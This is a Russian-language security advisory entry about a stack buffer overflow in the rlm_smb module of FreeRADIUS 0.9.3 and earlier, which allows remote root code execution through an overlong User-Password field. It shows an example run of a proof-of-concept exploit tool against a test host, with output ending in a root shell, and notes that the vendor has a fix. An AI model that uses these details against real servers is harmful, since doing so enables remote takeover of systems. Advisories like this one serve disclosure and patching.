Дата публикации: | 28.11.2003 |
Всего просмотров: | 1235 |
Опасность: | Высокая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: FreeRADIUS 0.9.3 и более ранние версии
Описание: Переполнение буфера обнаружено в FreeRADIUS в rlm_smb модуле. Удаленный пользователь может выполнить произвольный код с root привилегиями. Удаленный пользователь может представить чрезмерно длинный User-Password параметр, длинее 128 байт, чтобы вызвать переполнение стекового буфера. Уязвимость расположена в функции SMB_Logon_Server() в 'src/modules/rlm_smb/smblib.c' файле. Пример/Эксплоит: $ ./bugfree -p 1812 -u cparker -s testing123 192.168.3.12 FreeRADIUS <= 0.9.3 rlm_smb remote overflow exploit (PoC) Trying to login as user "cparker" with secret "testing123" ... Prepared the packet, 513 bytes Attacking 192.168.3.12:1812 ... Sent, checking for a shell ... Success, proceed with commands Linux lina.s-quadra.com 2.4.20 #1 Wed Nov 19 22:21:27 EST 2003 i686 unknown uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) exit URL производителя: http://www.freeradius.org Решение:Производитель выпустил исправление, доступное через CVS. |
|
Ссылки: | FreeRADIUS <= 0.9.3 rlm_smb module stack overflow vulnerability |